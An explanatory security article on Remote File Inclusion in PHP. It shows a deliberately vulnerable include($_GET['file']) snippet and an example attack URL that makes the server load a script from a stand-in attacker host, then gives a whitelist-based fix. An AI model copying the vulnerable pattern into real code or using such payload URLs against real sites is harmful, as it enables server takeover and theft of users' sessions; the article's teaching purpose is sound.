Everything About Remote File Inclusion And Prevention

I will now introduce you to the attack also known as RFI. You will learn about its main characteristics, then I will show you the impact it has, and later on we'll have some fun together looking at what it looks like in real examples. At the end, we will go over it all again and find a way to fix it! Excited?

Remote File Inclusion Description

What is the first thing that comes to your mind when you read the title? Some kind of attack which has something to do with files? Well, this issue is actually an inclusion attack. In such an attack, the attacker is able to make the web app include a remote file. This is done by exploiting a web app that needs to include external files or scripts, and needs to do so dynamically. Can you imagine the consequences of such a successful attack? They are very serious and can include Information Disclosure, Remote Code Execution and, believe it or not, XSS, the injection we talked about already. A powerful combination, don't you agree? Remote File Inclusion happens most of the time when the app receives, as input, a path to a file which must be included, and that input is not properly sanitized. That is why I always mention sanitizing when it comes to fixing or preventing vulnerabilities.

Remote File Inclusion Impact

As I have already said, some very familiar and dangerous injections were mentioned while describing RFI. That is quite enough for a person to understand the damage it can do. I will now explain to you what the attack actually looks like! First, we need an attacker who uses a search engine. He or she knows how to identify a website which contains some vulnerable content. After that, he or she uses a scanner, with which the attacker will easily identify a website which contains vulnerable components. Those are the first two steps, but remember that the attacker can use one way or the other, or, even worse, combine them. Once he has found what he was searching for, he exploits the remote file inclusion. What the vulnerability allows is uploading a backdoor shell. All in all, the results are frightening: the site is compromised, the data too, and the server is hijacked as well.

Example Of Remote File Inclusion

I will explain to you what this vulnerability looks like through an example of PHP code that is already vulnerable to RFI.

```php
<?php
/**
 * Get a filename from a GET input
 * Example – http://example.com/?file=filename.php
 */
$file = $_GET['file'];

/**
 * Unsafely include this file: the value is used as-is, so it may be a URL
 * Example – filename.php
 */
include($file);
```

In this example, the attacker can make a request like the one I will show you now. He or she would do it in order to trick the app, and the app would then execute a malicious script (for example a webshell).

http://example.com/?file=http://attacker.com/evil.php

Among all the attacks I have mentioned that fall under RFI, I will add some more information about little-known harms it can do. Why would the attacker use remote file inclusion at all? Well, because he is an attacker, right? Just kidding… He would use it to run malicious code on the targeted server: any file containing malicious code that he controls would be run on the server. Such an action leads to complete system compromise. Can you imagine such damage? There is one more thing I would like you to remember, and that is how the attacker can use RFI to run the same malicious code on clients. He can then easily manipulate the content of any response that has been sent or will be sent to that client. Stealing the client's session cookies is nothing new among RFI attackers.

How To Fix Remote File Inclusion

There is one best way to eliminate RFI vulnerabilities once they arrive (hopefully they won't). Remember that you must avoid dynamically including files based on user input. What if avoiding it is not even possible? Then make sure the app maintains a so-called whitelist of the files which may be included. With that step, you can be sure that you have limited the attacker's control over what actually gets included.
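Here is what the whitelist approach looks like in PHP, as an added example that is not part of the original post. It replaces the vulnerable `include($_GET['file'])` from above with a deny-by-default lookup table, so the user's input is only ever a key into that table and never a path or URL. The directory name `pages/`, the page names in the table and the `resolvePage()` helper are assumptions made for this example.

```php
<?php
// Added example (not the original post's code): whitelist-based page inclusion.
// Assumptions: includable files live under ./pages/ and the allowed set is the
// constructed ALLOWED_PAGES map below.

declare(strict_types=1);

// The only files this script may ever include, keyed by the public page name.
// Anything not listed here is rejected (deny by default).
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a user-supplied page name to a local file path, or return null.
 * Because the input is used only as an array key, values such as
 * "http://attacker.com/evil.php" or "../../etc/passwd" never reach include().
 */
function resolvePage(string $requested): ?string
{
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }

    $base = realpath(__DIR__ . '/pages');
    $path = realpath($base . '/' . ALLOWED_PAGES[$requested]);

    // Defence in depth: the resolved file must exist and still sit under ./pages/.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }

    return $path;
}

// Only accept a plain string; arrays (?file[]=x) and missing values fall back to "home".
$requested = $_GET['file'] ?? 'home';
if (!is_string($requested)) {
    $requested = '';
}

$path = resolvePage($requested);
if ($path === null) {
    http_response_code(404);
    exit('Unknown page');
}

include $path;
```

With this in place, `?file=home` includes `pages/home.php`, while the request from the example above, `?file=http://attacker.com/evil.php`, is not in the table and simply gets a 404. As an extra layer, PHP's `allow_url_include` ini directive controls whether `include` may load URLs at all; it defaults to Off in current PHP versions, and leaving it Off means a whitelist mistake still cannot turn into a remote include.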

If I may admit, these attacks are getting more and more serious. What we need to do is to familiarize people with them. No one needs to fear them, but everyone should know how they work in order to be able to stop them!